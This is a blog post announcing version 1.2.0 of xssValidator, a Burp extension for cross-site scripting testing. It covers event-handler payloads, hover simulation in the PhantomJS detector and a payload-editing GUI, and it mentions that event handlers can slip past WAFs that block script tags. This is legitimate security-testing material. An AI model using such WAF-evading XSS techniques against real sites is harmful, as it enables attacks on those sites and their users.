29 Aug, 2014

xssValidator v1.2.0 Released

by John Poulin

It has been quite a while since you’ve heard anything new about xssValidator, but today we bring good news! Version 1.2.0 has been released with some significant modifications.

Mouse Events:

As consultants, we tend to see more and more applications being developed that leverage clever client-side technologies to make the user experience more meaningful. These features normally utilize JavaScript functions that execute when a user clicks a button, when a user hovers on some object, or when other events occur.

Thanks to @f-block, xssValidator now has the ability to create payloads with specific JavaScript event handlers, such as onmouseover, that can be used within any HTML element attribute. As an attacker, this will allow us to avoid using <script> tags that may very well get caught by a WAF.

Within the payload definition panel (yes, that’s new, too!), we provide instructions for creating payloads with event handlers, but it’s as simple as this: {EVENTHANDLER}={JAVASCRIPT}

The Phantom.JS xss-detector script has been modified to support testing of event handling. When the detector is evaluating a page, it will now simulate hovering over each element of the page in an attempt to trigger events.

Currently the Slimer.JS xss-detector does not support this functionality; however, it is on the roadmap for version 1.2.1.

Enhanced GUI:

In this release we also spent some time (more than 30 minutes ;)) building a more useful GUI for the xssValidator tab.  It’s still not where we want it to be in terms of design and functionality, but it’s definitely a step in the right direction.

We’ve added the ability to view, modify, and create new payloads dynamically, right through the interface. Previously, if our users wanted to modify payloads, they would have to actually modify and recompile the source code, which isn’t very friendly. Most of our users install the plugin through the BApp store and don’t have the source readily available to them.

Along with the payload definition panel, we added the ability to define custom JavaScript functions and event handlers directly within the interface. Unfortunately, however, it will still be necessary to modify the xss-detectors to support any new functions or event handlers.

And most importantly, we added instructions! Because this extender requires external services (Phantom.JS / Slimer.JS), it’s important for the users to have instructions. Please note, the extender will run without the services, but that’s the same as running Burp Intruder with an XSS payload list.

As always, please let me know if you have any questions or concerns. This update was submitted to the BApp store and should be live within a few days. For the time being, please download the v1.2.0 release from our repository.

John Poulin is an application security consultant for nVisium who specializes in web application security. He worked previously as a web developer and software engineer that focused on building multi-tier web applications. When he’s not hacking on web apps, John spends his time building tools to help him hack on web apps! You can find him on twitter: @forced_request and on myspace: REDACTED.